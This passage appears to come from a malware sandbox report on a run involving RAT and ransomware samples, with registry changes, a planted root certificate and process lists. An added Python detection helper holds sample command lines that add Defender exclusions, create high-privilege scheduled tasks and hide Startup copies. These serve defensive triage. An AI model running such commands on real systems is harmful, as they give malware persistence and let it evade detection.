| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML\ = "ProcMon.Logfile.1" | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.shtml\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds\MSEdgeMHT | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML | C:\Program Files\sysint\Procmon64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\runas | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\ProgrammaticAccessOnly | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\AppUserModelId = "MSEdge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Users\\Admin\\Downloads\\ProcessMonitor\\Procmon64.exe\",0" | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\ProcessMonitor.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Program Files\sysint\Procmon64.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\srtware.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| N/A | N/A | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| N/A | N/A | C:\Program Files\sysint\Procmon64.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
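The process list that follows records the persistence and defence-evasion command lines directly: Add-MpPreference exclusions for XClient.exe, schtasks entries at /RL HIGHEST whose action points into AppData or Desktop (one of them re-launching every minute), attrib +h +r +s on copies dropped into the Startup folder, and cmd /c launching .bat files from Temp. The Python below is an added triage helper, not part of this sandbox report or of any of the families it names; the regexes and tag names are my own choices tuned to the command lines recorded here, and the sample input is copied from those command lines plus one benign svchost line for contrast.

```python
import re
from typing import Dict, List

# Added triage helper (not part of the sandbox report): tags one process command
# line with the persistence / defence-evasion patterns seen in this run.
# The patterns below are assumptions chosen to fit the command lines on the page.

DEFENDER_EXCL = re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\b", re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
TASK_ACTION = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)
RUN_HIGHEST = re.compile(r"/rl\s+highest\b", re.I)
EVERY_MINUTE = re.compile(r"/sc\s+minute\s+/mo\s+1\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Desktop|Downloads|Public)\\", re.I)
ATTRIB_HIDE = re.compile(r"\battrib\b(?=.*\+h\b)(?=.*\+s\b)", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
TEMP_BATCH = re.compile(r'\bcmd(?:\.exe)?\s+/c\s+"*[^"]*\\Temp\\[^"]*\.bat\b', re.I)


def triage_cmdline(cmd: str) -> List[str]:
    """Return the tags that fire on one command line (empty list = nothing notable)."""
    tags: List[str] = []
    if DEFENDER_EXCL.search(cmd):
        # The sample whitelists its own path / process name in Defender
        tags.append("defender-exclusion")
    if SCHTASKS_CREATE.search(cmd):
        m = TASK_ACTION.search(cmd)
        action = (m.group(1) or m.group(2)) if m else ""
        if RUN_HIGHEST.search(cmd) and USER_WRITABLE.search(action):
            # Highest-privilege task whose binary lives in a user-writable directory
            tags.append("schtasks-highest-from-user-writable")
        if EVERY_MINUTE.search(cmd):
            # Re-launch every minute: a watchdog, not a maintenance task
            tags.append("schtasks-every-minute")
    if ATTRIB_HIDE.search(cmd) and STARTUP_DIR.search(cmd):
        # Hidden + system + read-only on a Startup-folder copy
        tags.append("attrib-hide-startup-item")
    if TEMP_BATCH.search(cmd):
        # cmd /c <Temp>\*.bat is the RAT "restart myself" helper (chcp + ping sleep)
        tags.append("cmd-runs-temp-batch")
    return tags


def triage_process_list(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Group command lines by tag so an analyst sees each technique once."""
    hits: Dict[str, List[str]] = {}
    for cmd in cmdlines:
        for tag in triage_cmdline(cmd):
            hits.setdefault(tag, []).append(cmd)
    return hits


# Command lines copied from the process list on this page, plus one benign svchost line
SAMPLE_CMDLINES = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T4gy0CnbOZcl.bat" "
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
'''.strip().splitlines()


if __name__ == "__main__":
    for tag, cmds in triage_process_list(SAMPLE_CMDLINES).items():
        print(f"{tag}: {len(cmds)} hit(s)")
        for cmd in cmds:
            print("   ", cmd)
```

In practice the input is the CommandLine field of Sysmon Event ID 1 or Security 4688 rather than a pasted report; the rules are deliberately narrow so that a benign Scheduled Task or a legitimate Defender exclusion set by an administrator from Program Files does not fire. The every-minute task named "XClient" and the ONLOGON tasks named "svhost", "Startup" and "Discord" are consistent with the XWorm and Quasar/AsyncRAT builds the report identifies, but the tags describe the behaviour only; attribution stays with the family signatures above.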
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27351 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4251183b-c529-41a7-8d91-8e53ac557d75} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 27229 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cc0e51e-95aa-4547-9b13-6ad1322d4b08} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2848 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d88463-c8cc-4742-837f-cf01e8033871} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3844 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 32603 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9130ac1f-16ad-4cb5-9017-be9c7f3016be} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4672 -prefMapHandle 4676 -prefsLen 32603 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f93c553-1a5b-4df9-99f5-1047f643c37a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 4688 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06250da0-bfc0-4206-8418-b7c9fe76ac6e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94944873-ef8d-4978-bc1f-b97a2617367b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da95f5f0-4211-41c8-bc9c-919e72244a0a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
